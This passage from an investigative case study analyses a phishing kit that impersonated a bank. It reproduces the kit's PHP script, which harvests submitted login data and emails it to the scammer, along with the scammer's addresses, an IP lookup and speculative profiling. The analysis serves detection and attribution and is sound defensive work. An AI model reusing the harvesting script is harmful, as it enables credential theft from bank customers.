The bank web page that Tidball copied to create the phishing site had one of these mechanisms buried within its source. Tidball apparently missed it. The image that is being fetched is called 4.gif; you can see the various parameters split onto separate lines:

    <img name="imgPageDot" border="0"

    src="https://metric.wamu.com/4.gif

    ?ng_host=login.personal.wamu.com

    &ng_uf=

    &ng_pagetitle=-

    &ng_referrer=https:

    //login.personal.wamu.com/enroll/EnrollmentInstructions.asp

    &ng_sr=-

    &ng_cookieOK=Y

    &ngm_st=CA

    &ng_pdver=102

    &ng_r1=2004-10-26T05:09:03-08:00

    &ng_r2=0.6315228" alt="" />

 

Inferring the function of parameters like these can be difficult if you have only a single example to work from. In a case such as this, try to download the same or similar pages from the real bank site, look for the tags, and then compare the parameters with the original example. That is what I did here, and it was immediately apparent that the ng_r1 parameter represents the date and time at which the page defined in the ng_referrer parameter was downloaded. The parameter ng_r2 seems to contain a unique identifier that could be used to cross reference this image download with a record in the logs of the tracking web server.

The server access logs for a busy site should contain the IP address of the computer that Tidball used to download the original web page from the bank site. Normally there would be no way to distinguish that specific access from the millions of others from legitimate visitors. But with this tracking mechanism, the bank can cross reference the date and time in those logs, using the unique identifier to resolve multiple accesses at the same time. In principle, they can look for this type of URL in the modified pages on phishing sites and quickly identify the IP address of the computer used to download the original page. If they are very lucky, that address might lead them directly to the scammer.

The date and time of downloads are informative in themselves. In this example, you can see that Tidball downloaded this page on Tuesday, 26 October 2004 at 05:09:03-08:00. The time zone of -08:00, eight hours behind Greenwich Mean Time, is what you would expect for a server on the West Coast of the United States, which is where this bank is located.

It is unlikely, though not impossible, that someone in this time zone downloaded the page at five in the morning. By looking at the time zones around the world, you can make an educated guess about where a person might be located, or more likely, where they are not. 5 a.m. West Coast time corresponds to 8 a.m. on the East Coast of the United States, which is still a little early. Moving further East translates the time to early afternoon in Europe and into evening in India and China, both of which are reasonable times for someone to be working on their site. That doesn't narrow things down very much, since those time zones contain more than 90% of the world's population! But it does argue that someone outside of the United States downloaded that original page.

8. The PHP Scripts

As I discuss in Chapter 5, you cannot normally download the source code of PHP scripts from a web site, since the server is configured to execute them. But because they were contained within the tar file, which could be downloaded, the source code of the scripts from this scam was accessible.

The script SecurityMeasures.php is basically a copy of a page from the real bank site that has been modified to pass its form data to a second script, confirm.php. This second script is the most interesting of the two and is shown in Example 11-1.

Example 1. confirm.php

<?php

$Block='24.15.208.175';

$TO = "tidball1972@aol.com";

$DEFAULT_EXIT_PAGE = "http://wamu.com/personal/welcome/privacy.htm";

$EX_PAGE = "http://www.disneyland.com";

$ip=$_SERVER["REMOTE_ADDR"];

$headers = "From: wamus@yahoo.com";

$subject="adik";

$message = "";

 

if ($_SERVER["REMOTE_ADDR"] == $Block) {

   Header("Location: ".$EX_PAGE);

   exit;

}

if ($_SERVER["REMOTE_ADDR"] != $Block) {

   while (list($key, $val) = each($HTTP_POST_VARS)) {

      $message .= "$key : $val\n";

   }

   $message .= "\nSent from ($ip)\n";

   mail($TO, $subject, $message, $headers);

   if(! $exit_page) $exit_page = $DEFAULT_EXIT_PAGE;

   Header("Location: ".$exit_page);

}

?>

 

This concise script reads in the parameters from the associated form and adds them to a string. This is sent out to the specified email address, and the script completes by returning a web page to the browser that contains only a Location HTTP header, which redirects the user to a specified web page. In this case, that page is a privacy notice on the real bank site.

As you have no doubt realized, this script is where the name Tidball comes from. The creator has set up the script to forward its collected data to an address at aol.com. Web-based email accounts are a favorite way for phishers to harvest their data. They are easy to set up without revealing your true identity and can be accessed from any machine. AOL accounts are especially easy to set up, thanks to the free trial access CDs that they liberally distribute.

On the one hand, the discovery of Tidball's email address is a real coup, but in reality, this will have been a short-lived account that was used only to receive data from this fake bank site. That is backed up by the fact that the only difference between the instances of confirm.php from the two examples is that address, as shown in this output from diff:

    3c3

    < $TO = "tidball1972@aol.com";

    ---

    > $TO = "tidball@runbox.com";

 

In the second example, the email is sent to an account on a web mail server in Norway. The use of the same name in both addresses is clearly interesting. It is hard to imagine the person behind these scams actually using his or her real name, but stranger things have happened. It could be that Tidball felt sufficiently secure, or was perhaps sufficiently naïve, not to choose another name, but that seems unlikely.

The script contains a second piece of revealing information. It defines a specific IP address in this line:

    $Block='24.15.208.175';

 

If the browser making the request has this address, then the script immediately redirects it to the web site for Disneyland without sending an email message. The same address is blocked in both examples of the script. There is clearly some special connection between this address and Tidball. The most appealing idea would be that this is the address of Tidball's own computer, and perhaps it has been blocked in order to make testing of the script more convenient. It is impossible to determine the real intent behind this, but it is certainly intriguing.

Pursuing this further, I used dig and whois to find out more about the address. dig showed the machine to be part of Comcast's network:

    % dig -x 24.15.208.175

    [...]

    ;; ANSWER SECTION:

    175.208.15.24.in-addr.arpa. 86400 IN    PTR

        c-24-15-208-175.hsd1.il.comcast.net.

 

Comcast is one of the large cable TV companies in the United States and provides many people with high-speed Internet access at home via cable modems. These have been the targets of attackers, because many of the attached computers do not have firewall software set up. It is possible that Tidball has hijacked this machine as a way to disguise him or herself. Another thing to bear in mind is that these machines are typically given dynamic IP addresses, so the one using this address today may not be the same as the one that used it when the scams were active.

The domain name of il.comcast.net suggests a location in Illinois, and running whois on the IP address confirms this:

    % whois 24.15.208.175

    [Querying whois.arin.net]

    [whois.arin.net]

    Comcast Cable Communications, IP Services EASTERNSHORE-1 (NET-24-0-0-0-1)

                                      24.0.0.0 - 24.15.255.255

    Comcast Cable Communications ILLINOIS-14 (NET-24-12-0-0-1)

                                      24.12.0.0 - 24.15.255.255

 

This section of the Comcast network, called EASTERNSHORE-1, probably represents Chicago and its surrounding towns. The only shoreline in Illinois is in this northeastern corner of the state. If this is the address of Tidball's machine, then its location in the middle of the United States does not fit with the time zone information, but it could just be that our friend is an early riser.

9. What Else Has Tidball Been Involved In?

A number of unusual clues, or signatures, presented themselves as I worked through these two parallel phishing examples. It is important to make a note of these as you encounter them because any one of them could help identify related scams. In this case, there were three main signatures:

 

The unusual phrasing of the email

We recently have determined...

 

The unusual X-Mailer header line

X-Mailer: The Bat! (v2.01)

 

The name of the redirection script

realstat.php

These all occurred in the original emails, so it made sense to look for them in other messages in my mail folders. Basic searches using grep showed that The Bat! occurs in the X-Mailer headers of a lot of junk email, so that was not a useful signature. The other two search strings hit only the two original emails, indicating that these may be specific to this series of scams.

The next step was to use these strings in Google queries to see if anyone else had encountered the scams and might have additional information. The phrase taken from the email body produced a large number of hits. Even extending the query to "we recently have determined that different computers" produced more than 900 matches. Most of these were to pages that list phishing scams and spam. Phishing attacks on Washington Mutual accounted for some of these, but there were many more examples of fake emails from PayPal, eBay, and many other banks. These messages have very similar wording but appear to use different types of target URLs. This suggests that various people have adopted the same text of an original email message for their own phishing attempts. This could reflect a lack of creativity or just simple laziness on the part of the scammers. It may indicate that some of the people do not have English as their primary language, in which case it might be easier to use an existing block of text. So although this query string is specific for phishing scams, it does resolve this particular variant.

After some experimentation, using realstat.php in the query and trying multiple search engines, I was able to find two other examples that match our original scams. The URLs contained in these two emails fit the template of the original examples exactly, using realstat.php to redirect to a second URL. Presumably this redirects the browser to a third site, as before:

Interestingly, the addresses of the two initial sites are both in the same network block. One of the redirect sites is in this block, and the other is the same as one of the original sites. That observation, combined with the specific format for the URLs, is a clear indication that Tidball was involved in these two scams.

It may be that these are the only phishing attempts that Tidball has made. Perhaps they were so successful that he or she is enjoying the good life on a beach somewhere. More likely, Tidball has moved on to another scam with a different modus operandi.

10. Timeline

The dates contained in the email messages, the web site directories, and the tar files can be combined to create a timeline for this series of scams. You can see how the fake web site was built and then installed on the two initial servers, followed by the sending of the associated spam.

 

Tuesday, 26 October 2004

A page from the original bank site was copied and converted into SecurityMeasures.php.

 

Sunday, 31 October 2004

A page from the original bank site was copied and converted into logon.htm.

 

Monday, 1 November 2004

The distribution file, template.tar, was created.

 

Sunday, 2 January 2005

Files were uploaded to the 64.157.x.x server.

 

Sunday, 9 January 2005

Files were uploaded to the 66.230.x.x server.

 

Thursday 13 January 2005

An edit made to confirm.php to insert the final email address in the 64.157.x.x instance.

 

Tuesday, 18 January 2005

An edit made to confirm.php to insert the final email address in the 66.230.x.x instance.

 

Saturday, 29 January 2005

The email that led to the 64.157.x.x instance was sent.

 

Monday, 14 February 2005

The email that led to the 66.230.x.x instance was sent.

More than three months have elapsed between the original download of the bank pages and the deployment of the first email announcement. This is not the work of someone in a great hurry to get the scams up and running.

11. Who Is Tidball?

Every clue that this study has uncovered tells us something about Tidball. I can't come up with a name and address, but by combining facts with a bit of intuition, I can put together a fairly detailed profile. Here are the conclusions that I would put my money on:

 

Tidball is an individual

The extended timeline for these two scams argues against an organized group. Either Tidball is extremely busy with other things or this is a side project.

 

Tidball is smart, but careless

He or she has managed to break into and hijack the pornography sites. The exploit used is relatively well known but it will have taken some work to find sites that were vulnerable. He made two major mistakes in leaving the tar files behind on the hijacked sites and in not removing the bank tracking information at the bottom of the copied web pages. The combination of smart and careless suggests to me that Tidball is young, or at least not very experienced in the world of Internet scams.

 

Tidball might be from Chicago...or maybe not

Here's where I go out on a limb. The times at which the original bank pages were downloaded suggest a location outside the United States. However, the inclusion of a specific IP address in the PHP script that maps to the Chicago area is too striking of a detail to ignore. This computer either belongs to Tidball or is under his or her control. The former is the simplest explanation but that time difference troubles me so I am betting that this is a compromised machine that Tidball has broken in to at some stage.

 

Tidball is British or American

It is always dangerous to read too much into a name but the choice of Tidball is intriguing. Delving into various genealogy databases shows that it has its origins in the United Kingdom, most notably in the counties of Somerset and Devon. There are also many instances of the name in the United States, both currently and in historical records. If you did not already have a connection to the name then it seems an unlikely choice. Of course, if you wanted to pick a random alias then it is as good as any other. It seems to have no cultural connections, such as the name of a character from, say, Monty Python or Lord of the Rings. The simplest explanations are that the choice is random or that this is actually the name of the scammer. I have a hunch that it is the latter.

That is as far as this case study can go without involving ISPs or being able to look at the web server logs of the bank that was impersonated. Using relatively simple techniques, I have been able to uncover a remarkable amount of information about this scam and the person behind it. Perhaps more importantly, I had a lot of fun investigating this operation.